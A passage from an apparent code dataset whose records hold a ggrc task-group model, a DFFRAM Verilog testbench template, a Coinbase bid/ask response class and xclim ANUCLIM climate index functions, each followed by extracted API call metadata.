(['[[1, 2, 3]]'], {}), '([[1, 2, 3]])\n', (1531, 1544), True, 'import numpy as np\n'), ((1564, 1585), 'numpy.array', 'np.array', (['[[1, 2, 3]]'], {}), '([[1, 2, 3]])\n', (1572, 1585), True, 'import numpy as np\n'), ((1314, 1331), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {}), '()\n', (1329, 1331), False, 'from neupy import algorithms\n'), ((1358, 1377), 'numpy.array', 'np.array', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1366, 1377), True, 'import numpy as np\n'), ((1398, 1417), 'numpy.array', 'np.array', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1406, 1417), True, 'import numpy as np\n'), ((1723, 1742), 'numpy.array', 'np.array', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1731, 1742), True, 'import numpy as np\n')]
Smotko/ggrc-core
src/ggrc_workflows/models/task_group_object.py
b3abb58b24e7559960d71a94ba79c75539e7fe29
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file> # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> # Created By: [email protected] # Maintained By: [email protected] from sqlalchemy.ext.associationproxy import association_proxy from ggrc import db from ggrc.models.mixins import Mapping from ggrc.models.mixins import Timeboxed from ggrc.models.reflection import PublishOnly class TaskGroupObject(Timeboxed, Mapping, db.Model): __tablename__ = 'task_group_objects' task_group_id = db.Column( db.Integer, db.ForeignKey('task_groups.id'), nullable=False) object_id = db.Column(db.Integer, nullable=False) object_type = db.Column(db.String, nullable=False) @property def object_attr(self): return '{0}_object'.format(self.object_type) @property def object(self): return getattr(self, self.object_attr) @object.setter def object(self, value): self.object_id = value.id if value is not None else None self.object_type = value.__class__.__name__ if value is not None \ else None return setattr(self, self.object_attr, value) @staticmethod def _extra_table_args(cls): return ( db.UniqueConstraint('task_group_id', 'object_id', 'object_type'), db.Index('ix_task_group_id', 'task_group_id'), ) _publish_attrs = [ 'task_group', 'object', ] _sanitize_html = [] @classmethod def eager_query(cls): from sqlalchemy import orm query = super(TaskGroupObject, cls).eager_query() return query.options( orm.subqueryload('task_group')) def _display_name(self): return self.object.display_name + '<->' + self.task_group.display_name def copy(self, _other=None, **kwargs): columns = [ 'task_group', 'object_id', 'object_type' ] target = self.copy_into(_other, columns, **kwargs) return target class TaskGroupable(object): @classmethod def late_init_task_groupable(cls): def make_task_group_objects(cls): cls.task_groups = association_proxy( 'task_group_objects', 'task_group', creator=lambda task_group: TaskGroupObject( task_group=task_group, object_type=cls.__name__, ) ) joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\ 'foreign(TaskGroupObject.object_type) == "{type}")' joinstr = joinstr.format(type=cls.__name__) return db.relationship( 'TaskGroupObject', primaryjoin=joinstr, backref='{0}_object'.format(cls.__name__), cascade='all, delete-orphan', ) cls.task_group_objects = make_task_group_objects(cls) _publish_attrs = [ PublishOnly('task_groups'), 'task_group_objects', ] _include_links = [] @classmethod def eager_query(cls): from sqlalchemy import orm query = super(TaskGroupable, cls).eager_query() return cls.eager_inclusions(query, TaskGroupable._include_links).options( orm.subqueryload('task_group_objects'))
[((653, 690), 'ggrc.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(False)'}), '(db.Integer, nullable=False)\n', (662, 690), False, 'from ggrc import db\n'), ((707, 743), 'ggrc.db.Column', 'db.Column', (['db.String'], {'nullable': '(False)'}), '(db.String, nullable=False)\n', (716, 743), False, 'from ggrc import db\n'), ((590, 621), 'ggrc.db.ForeignKey', 'db.ForeignKey', (['"""task_groups.id"""'], {}), "('task_groups.id')\n", (603, 621), False, 'from ggrc import db\n'), ((2742, 2768), 'ggrc.models.reflection.PublishOnly', 'PublishOnly', (['"""task_groups"""'], {}), "('task_groups')\n", (2753, 2768), False, 'from ggrc.models.reflection import PublishOnly\n'), ((1220, 1284), 'ggrc.db.UniqueConstraint', 'db.UniqueConstraint', (['"""task_group_id"""', '"""object_id"""', '"""object_type"""'], {}), "('task_group_id', 'object_id', 'object_type')\n", (1239, 1284), False, 'from ggrc import db\n'), ((1294, 1339), 'ggrc.db.Index', 'db.Index', (['"""ix_task_group_id"""', '"""task_group_id"""'], {}), "('ix_task_group_id', 'task_group_id')\n", (1302, 1339), False, 'from ggrc import db\n'), ((1591, 1621), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group"""'], {}), "('task_group')\n", (1607, 1621), False, 'from sqlalchemy import orm\n'), ((3035, 3073), 'sqlalchemy.orm.subqueryload', 'orm.subqueryload', (['"""task_group_objects"""'], {}), "('task_group_objects')\n", (3051, 3073), False, 'from sqlalchemy import orm\n')]
ahmednofal/DFFRAM
verification/tb_template.py
7d7ebc28befe12ec3f232c0d2f5b8ea786227d45
# Copyright ©2020-2021 The American University in Cairo and the Cloud V Project. # # This file is part of the DFFRAM Memory Compiler. # See https://github.com/Cloud-V/DFFRAM for further info. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. RAM_instantiation = """ /* An auto generated testbench to verify RAM{word_num}x{word_size} Authors: Mohamed Shalan ([email protected]) Ahmed Nofal ([email protected]) */ `define VERBOSE_1 `define VERBOSE_2 `define UNIT_DELAY #1 `define USE_LATCH 1 `define SIZE {word_size}/8 //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v" //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v" // // Temporary override: IcarusVerilog cannot read these for some reason ^ `include "hd_primitives.v" `include "hd_functional.v" `include "{filename}" module tb_RAM{word_num}x{word_size}; localparam SIZE = `SIZE; localparam A_W = {addr_width}+$clog2(SIZE); localparam M_SZ = 2**A_W; reg CLK; reg [(SIZE-1):0] WE0; reg EN0; reg [(SIZE*8-1):0] Di0; wire [(SIZE*8-1):0] Do0; reg [A_W-1:0] A0, ADDR; reg [7:0] Phase; reg [7:0] RANDOM_BYTE; event done; RAM{word_num} #(.USE_LATCH(`USE_LATCH), .WSIZE(SIZE)) SRAM ( .CLK(CLK), .WE0(WE0), .EN0(EN0), .Di0(Di0), .Do(Do0), .A0(A0[A_W-1:$clog2(SIZE)]) ); initial begin $dumpfile("tb_RAM{word_num}x{word_size}.vcd"); $dumpvars(0, tb_RAM{word_num}x{word_size}); @(done) $finish; end /* Memory golden Model */ reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0]; reg [(SIZE*8-1):0] RAM_DATA_RW; genvar c; generate for (c=0; c < SIZE; c = c+1) begin: mem_golden_model always @(posedge CLK) begin if(EN0) begin RAM_DATA_RW <= RAM[A0/SIZE]; if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c]; end end end endgenerate """ begin_single_ported_test = """ initial begin CLK = 0; WE0 = 0; EN0 = 1; """ single_ported_custom_test = """ Phase = 0; // Perform a single word write then read mem_write_word({{SIZE{{8'h90}}}}, 4); mem_read_word_0(4); """ RAM_instantiation_1RW1R = """ /* An auto generated testbench to verify RAM{word_num}x{word_size} Authors: Mohamed Shalan ([email protected]) Ahmed Nofal ([email protected]) */ `define VERBOSE_1 `define VERBOSE_2 `define UNIT_DELAY #1 `define USE_LATCH 1 `define SIZE {word_size}/8 //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v" //`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v" // // Temporary override: IcarusVerilog cannot read these for some reason ^ `include "hd_primitives.v" `include "hd_functional.v" `include "{filename}" module tb_RAM{word_num}x{word_size}_1RW1R; localparam SIZE = `SIZE; localparam A_W = {addr_width}+$clog2(SIZE); localparam M_SZ = 2**A_W; reg CLK; reg [(SIZE-1):0] WE0; reg EN0; reg ENR; reg [(SIZE*8-1):0] Di0; wire [(SIZE*8-1):0] Do0; wire [(SIZE*8-1):0] Do1; reg [A_W-1:0] A0, A1, ADDR; reg [7:0] Phase; reg [7:0] RANDOM_BYTE; event done; RAM{word_num}_1RW1R #(.USE_LATCH(`USE_LATCH), .WSIZE(`SIZE)) SRAM ( .CLK(CLK), .WE0(WE0), .EN0(EN0), .EN1(ENR), .Di0(Di0), .Do0(Do0), .Do1(Do1), .A0(A0[A_W-1:$clog2(SIZE)]), .A1(A1[A_W-1:$clog2(SIZE)]) ); initial begin $dumpfile("tb_RAM{word_num}x{word_size}_1RW1R.vcd"); $dumpvars(0, tb_RAM{word_num}x{word_size}_1RW1R); @(done) $finish; end /* Memory golden Model */ reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0]; reg [(SIZE*8-1):0] RAM_DATA_RW; reg [(SIZE*8-1):0] RAM_DATA_R; genvar c; generate for (c=0; c < SIZE; c = c+1) begin: mem_golden_model always @(posedge CLK) begin if(EN0) begin RAM_DATA_RW <= RAM[A0/SIZE]; if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c]; end if (ENR) begin RAM_DATA_R <= RAM[A1/SIZE]; end end end endgenerate """ begin_dual_ported_test = """ initial begin CLK = 0; WE0 = 0; EN0 = 1; ENR = 1; """ dual_ported_custom_test = """ Phase = 0; // Perform a 2 word write then read 2 words mem_write_word({{SIZE{{8'h90}}}}, 4); mem_write_word({{SIZE{{8'h33}}}}, 8); mem_read_2words(4,8); """ start_test_common = """ always #10 CLK = !CLK; integer i; """ test_port_1RW1R = """ /*********************************************************** Write and read from different ports ************************************************************/ // Fill the memory with a known pattern // Word Write then Read Phase = 1; `ifdef VERBOSE_1 $display("\\nFinished Phase 0, starting Phase 1"); `endif for(i=0; i<M_SZ; i=i+SIZE) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ; RANDOM_BYTE = $urandom; mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR); mem_read_word_1( ADDR ); end // HWord Write then Read Phase = 2; `ifdef VERBOSE_1 $display("\\nFinished Phase 1, starting Phase 2"); `endif for(i=0; i<M_SZ; i=i+SIZE/2) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE; RANDOM_BYTE = $urandom; mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR); mem_read_word_1( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end // Byte Write then Read Phase = 3; `ifdef VERBOSE_1 $display("\\nFinished Phase 2, starting Phase 3"); `endif for(i=0; i<M_SZ; i=i+1) begin ADDR = (($urandom%M_SZ)); mem_write_byte($urandom%255, ADDR); mem_read_word_1(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end """ test_port_RW = """ /*********************************************************** Write and read from same port ************************************************************/ Phase = 4; `ifdef VERBOSE_1 $display("\\nFinished Phase 3, starting Phase 4"); `endif for(i=0; i<M_SZ; i=i+SIZE) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ; RANDOM_BYTE = $urandom; mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR); mem_read_word_0( ADDR ); end // HWord Write then Read Phase = 5; `ifdef VERBOSE_1 $display("\\nFinished Phase 4, starting Phase 5"); `endif for(i=0; i<M_SZ; i=i+SIZE/2) begin ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE; RANDOM_BYTE = $urandom; mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR); mem_read_word_0( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end // Byte Write then Read Phase = 6; `ifdef VERBOSE_1 $display("\\nFinished Phase 5, starting Phase 6"); `endif for(i=0; i<M_SZ; i=i+1) begin ADDR = (($urandom%M_SZ)); mem_write_byte($urandom%255, ADDR); mem_read_word_0(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} ); end $display ("\\n>> Test Passed! <<\\n"); -> done; """ end_test = """ end """ tasks = """ task mem_write_byte(input [7:0] byte, input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr;//[A_WIDTH:2]; WE0 = (1 << addr[$clog2(SIZE)-1:0]); Di0 = (byte << (addr[$clog2(SIZE)-1:0] * 8)); @(posedge CLK); `ifdef VERBOSE_2 $display("WRITE BYTE: 0x%X to %0X(%0D) (0x%X, %B)", byte, addr, addr, Di0, WE0); `endif WE0 = {SIZE{8'h00}}; end endtask task mem_write_hword(input [SIZE*8-1:0] hword, input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr;//[A_WIDTH:$clog2(SIZE)]; WE0 = {{SIZE/2{addr[$clog2(SIZE)-1]}},{SIZE/2{~addr[$clog2(SIZE)-1]}}}; Di0 = (hword << (addr[$clog2(SIZE)-1] * (SIZE/2)*8)); @(posedge CLK); `ifdef VERBOSE_2 $display("WRITE HWORD: 0x%X to %0X(%0D) (0x%X, %B)", hword, addr, addr, Di0, WE0); `endif WE0 = {SIZE{8'h00}}; end endtask task mem_write_word(input [SIZE*8-1:0] word, input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr; WE0 = {SIZE{8'hFF}}; Di0 = word; @(posedge CLK); `ifdef VERBOSE_2 $display("WRITE WORD: 0x%X to %0X(%0D) (0x%X, %B)", word, addr, addr, Di0, WE0); `endif WE0 = {SIZE{8'h00}}; end endtask task mem_read_word_0(input [A_W-1:0] addr); begin @(posedge CLK); A0 = addr;//[9:2]; WE0 = {SIZE{8'h00}}; @(posedge CLK); #5; `ifdef VERBOSE_2 $display("READ WORD: 0x%X from %0D", Do0, addr); `endif check0(); end endtask task check0; begin if(RAM_DATA_RW !== Do0) begin $display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i); $display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A0, Do0, RAM[A0/SIZE]); $fatal(1); end end endtask """ dual_ported_tasks = """ task mem_read_2words(input [A_W-1:0] addr0, input [A_W-1:0] addr1); begin @(posedge CLK); A0= addr0;//[9:2]; A1= addr1;//[9:2]; WE0 = {SIZE{8'h00}}; @(posedge CLK); #5; `ifdef VERBOSE_2 $display("READ WORD0: 0x%X from %0D", Do0, addr0); $display("READ WORD1: 0x%X from %0D", Do1, addr1); `endif check0(); check1(); end endtask task mem_read_word_1(input [A_W-1:0] addr); begin @(posedge CLK); A1 = addr;//[9:2]; WE0 = {SIZE{8'h00}}; @(posedge CLK); #5; `ifdef VERBOSE_2 $display("READ WORD: 0x%X from %0D", Do1, addr); `endif check1(); end endtask task check1; begin if(RAM_DATA_R !== Do1) begin $display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i); $display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A1, Do1, RAM[A1/SIZE]); $fatal(1); end end endtask """ endmodule = """ endmodule """
[]
krystianbajno/stocks
services/stocks-api/app/api/clients/coinbase/CoinbaseResponse.py
0a1a9283cb6debe36cfe01308eb4bc0b85217a02
class CoinbaseResponse: bid = 0 ask = 0 product_id = None def set_bid(self, bid): self.bid = float(bid) def get_bid(self): return self.bid def set_ask(self, ask): self.ask = float(ask) def get_ask(self): return self.ask def get_product_id(self): return self.product_id def set_product_id(self, product_id): self.product_id = product_id
[]
bzah/xclim
xclim/indices/_anuclim.py
18ceee3f1db2d39355913c1c60ec32ddca6baccc
# noqa: D100 from typing import Optional import numpy as np import xarray from xclim.core.units import ( convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint, ) from xclim.core.utils import ensure_chunk_size from ._multivariate import ( daily_temperature_range, extreme_temperature_range, precip_accumulation, ) from ._simple import tg_mean from .generic import select_resample_op from .run_length import lazy_indexing # Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start # See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases # -------------------------------------------------- # # ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! # # -------------------------------------------------- # __all__ = [ "temperature_seasonality", "precip_seasonality", "tg_mean_warmcold_quarter", "tg_mean_wetdry_quarter", "prcptot_wetdry_quarter", "prcptot_warmcold_quarter", "prcptot", "prcptot_wetdry_period", "isothermality", ] _xr_argops = { "wettest": xarray.DataArray.argmax, "warmest": xarray.DataArray.argmax, "dryest": xarray.DataArray.argmin, "driest": xarray.DataArray.argmin, "coldest": xarray.DataArray.argmin, } _np_ops = { "wettest": "max", "warmest": "max", "dryest": "min", "driest": "min", "coldest": "min", } @declare_units(tasmin="[temperature]", tasmax="[temperature]") def isothermality( tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS" ) -> xarray.DataArray: r"""Isothermality. The mean diurnal range divided by the annual temperature range. Parameters ---------- tasmin : xarray.DataArray Average daily minimum temperature at daily, weekly, or monthly frequency. tasmax : xarray.DataArray Average daily maximum temperature at daily, weekly, or monthly frequency. freq : str Resampling frequency. Returns ------- xarray.DataArray, [%] Isothermality Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq) etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq) with xarray.set_options(keep_attrs=True): iso = dtr / etr * 100 iso.attrs["units"] = "%" return iso @declare_units(tas="[temperature]") def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray: r"""ANUCLIM temperature seasonality (coefficient of variation). The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation of temperature values for a given year expressed as a percentage of the mean of those temperatures. Parameters ---------- tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. Returns ------- xarray.DataArray, [%] Mean temperature coefficient of variation Examples -------- The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality: >>> import xclim.indices as xci >>> t = xr.open_dataset(path_to_tas_file).tas >>> tday_seasonality = xci.temperature_seasonality(t) >>> t_weekly = xci.tg_mean(t, freq='7D') >>> tweek_seasonality = xci.temperature_seasonality(t_weekly) Notes ----- For this calculation, the mean in degrees Kelvin is used. This avoids the possibility of having to divide by zero, but it does mean that the values are usually quite small. According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ tas = convert_units_to(tas, "K") with xarray.set_options(keep_attrs=True): seas = 100 * _anuclim_coeff_var(tas) seas.attrs["units"] = "%" return seas @declare_units(pr="[precipitation]") def precip_seasonality( pr: xarray.DataArray, ) -> xarray.DataArray: r"""ANUCLIM Precipitation Seasonality (C of V). The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation of precipitation values for a given year expressed as a percentage of the mean of those values. Parameters ---------- pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. Units need to be defined as a rate (e.g. mm d-1, mm week-1). Returns ------- xarray.DataArray, [%] Precipitation coefficient of variation Examples -------- The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality: >>> import xclim.indices as xci >>> p = xr.open_dataset(path_to_pr_file).pr >>> pday_seasonality = xci.precip_seasonality(p) >>> p_weekly = xci.precip_accumulation(p, freq='7D') # Input units need to be a rate >>> p_weekly.attrs['units'] = "mm/week" >>> pweek_seasonality = xci.precip_seasonality(p_weekly) Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator values. """ # If units in mm/sec convert to mm/days to avoid potentially small denominator if units2pint(pr) == units("mm / s"): pr = convert_units_to(pr, "mm d-1") with xarray.set_options(keep_attrs=True): seas = 100 * _anuclim_coeff_var(pr) seas.attrs["units"] = "%" return seas @declare_units(tas="[temperature]") def tg_mean_warmcold_quarter( tas: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS", ) -> xarray.DataArray: r"""ANUCLIM Mean temperature of warmest/coldest quarter. The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise as 3 months. Parameters ---------- tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. op : str {'warmest', 'coldest'} Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [same as tas] Mean temperature values of the {op} quearter of each year. Examples -------- The following would compute for each grid cell of file `tas.day.nc` the annual temperature warmest quarter mean temperature: >>> import xclim.indices as xci >>> t = xr.open_dataset(path_to_tas_file) >>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='daily') Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ out = _to_quarter(src_timestep, tas=tas) oper = _np_ops[op] out = select_resample_op(out, oper, freq) out.attrs["units"] = tas.units return out @declare_units(tas="[temperature]", pr="[precipitation]") def tg_mean_wetdry_quarter( tas: xarray.DataArray, pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS", ) -> xarray.DataArray: r"""ANUCLIM Mean temperature of wettest/driest quarter. The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise are 3 months. Parameters ---------- tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. op : {'wettest', 'driest'} Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [same as tas] Mean temperature values of the {op} quarter of each year. Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ tas_qrt = _to_quarter(src_timestep, tas=tas) pr_qrt = _to_quarter(src_timestep, pr=pr) xr_op = _xr_argops[op] with xarray.set_options(keep_attrs=True): out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq) out.attrs = tas.attrs return out @declare_units(pr="[precipitation]") def prcptot_wetdry_quarter( pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS" ) -> xarray.DataArray: r"""ANUCLIM Total precipitation of wettest/driest quarter. The wettest (or driest) quarter of the year is determined, and the total precipitation of this period is calculated. If the input data frequency is daily ("D") or weekly ("W") quarters are defined as 13 week periods, otherwise are 3 months. Parameters ---------- pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. op : {'wettest', 'driest'} Operation to perform : 'wettest' calculate wettest quarter ; 'driest' calculate driest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [length] Total precipitation values of the {op} quarter of each year. Examples -------- The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation: >>> from xclim.indices import prcptot_wetdry_quarter >>> p = xr.open_dataset(path_to_pr_file) >>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D') Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ # returns mm values pr_qrt = _to_quarter(src_timestep, pr=pr) try: oper = _np_ops[op] except KeyError: raise NotImplementedError( f'Unknown operation "{op}" ; not one of "wettest" or "driest"' ) out = select_resample_op(pr_qrt, oper, freq) out.attrs["units"] = pr_qrt.units return out @declare_units(pr="[precipitation]", tas="[temperature]") def prcptot_warmcold_quarter( pr: xarray.DataArray, tas: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS", ) -> xarray.DataArray: r"""ANUCLIM Total precipitation of warmest/coldest quarter. The warmest (or coldest) quarter of the year is determined, and the total precipitation of this period is calculated. If the input data frequency is daily ("D) or weekly ("W"), quarters are defined as 13 week periods, otherwise are 3 months. Parameters ---------- pr : xarray.DataArray Total precipitation rate at daily, weekly, or monthly frequency. tas : xarray.DataArray Mean temperature at daily, weekly, or monthly frequency. op : {'warmest', 'coldest'} Operation to perform: 'warmest' calculate for the warmest quarter ; 'coldest' calculate for the coldest quarter. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray : [mm] Total precipitation values of the {op} quarter of each year Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ # determine input data frequency tas_qrt = _to_quarter(src_timestep, tas=tas) # returns mm values pr_qrt = _to_quarter(src_timestep, pr=pr) xr_op = _xr_argops[op] out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq) out.attrs = pr_qrt.attrs return out @declare_units(pr="[precipitation]") def prcptot( pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS" ) -> xarray.DataArray: r"""ANUCLIM Accumulated total precipitation. Parameters ---------- pr : xarray.DataArray Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [length] Total precipitation. Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. """ pram = rate2amount(pr) return pram.resample(time=freq).sum(dim="time", keep_attrs=True) # FIXME: src_timestep is not used here. @declare_units(pr="[precipitation]") def prcptot_wetdry_period( pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS" ) -> xarray.DataArray: r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step. Parameters ---------- pr : xarray.DataArray Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar. op : {'wettest', 'driest'} Operation to perform : 'wettest' calculate wettest period ; 'driest' calculate driest period. src_timestep : {'D', 'W', 'M'} Input data time frequency - One of daily, weekly or monthly. freq : str Resampling frequency. Returns ------- xarray.DataArray, [length] Total precipitation of the {op} period. Notes ----- According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be calculated prior to calling the function. """ pram = rate2amount(pr) if op == "wettest": return pram.resample(time=freq).max(dim="time", keep_attrs=True) if op == "driest": return pram.resample(time=freq).min(dim="time", keep_attrs=True) raise NotImplementedError( f'Unknown operation "{op}" ; op parameter but be one of "wettest" or "driest"' ) def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray: """Calculate the annual coefficient of variation for ANUCLIM indices.""" std = arr.resample(time="YS").std(dim="time") mu = arr.resample(time="YS").mean(dim="time") return std / mu def _from_other_arg( criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str ) -> xarray.DataArray: """Pick values from output based on operation returning an index from criteria. Parameters ---------- criteria : DataArray Series on which operation returning index is applied. output : DataArray Series to be indexed. op : func Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax. freq : str Temporal grouping. Returns ------- DataArray Output values where criteria is met at the given frequency. """ ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output}) dim = "time" def get_other_op(dataset): all_nans = dataset.criteria.isnull().all(dim=dim) index = op(dataset.criteria.where(~all_nans, 0), dim=dim) return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans) return ds.resample(time=freq).map(get_other_op) def _to_quarter( freq: str, pr: Optional[xarray.DataArray] = None, tas: Optional[xarray.DataArray] = None, ) -> xarray.DataArray: """Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications.""" if freq.upper().startswith("D"): if tas is not None: tas = tg_mean(tas, freq="7D") if pr is not None: # Accumulate on a week # Ensure units are back to a "rate" for rate2amount below pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm") pr.attrs["units"] = "mm/week" freq = "W" if freq.upper().startswith("W"): window = 13 elif freq.upper().startswith("M"): window = 3 else: raise NotImplementedError( f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".' ) if tas is not None: tas = ensure_chunk_size(tas, time=np.ceil(window / 2)) if pr is not None: pr = ensure_chunk_size(pr, time=np.ceil(window / 2)) if pr is not None: pram = rate2amount(pr) out = pram.rolling(time=window, center=False).sum() out.attrs = pr.attrs out.attrs["units"] = pram.units if tas is not None: out = tas.rolling(time=window, center=False).mean(skipna=False) 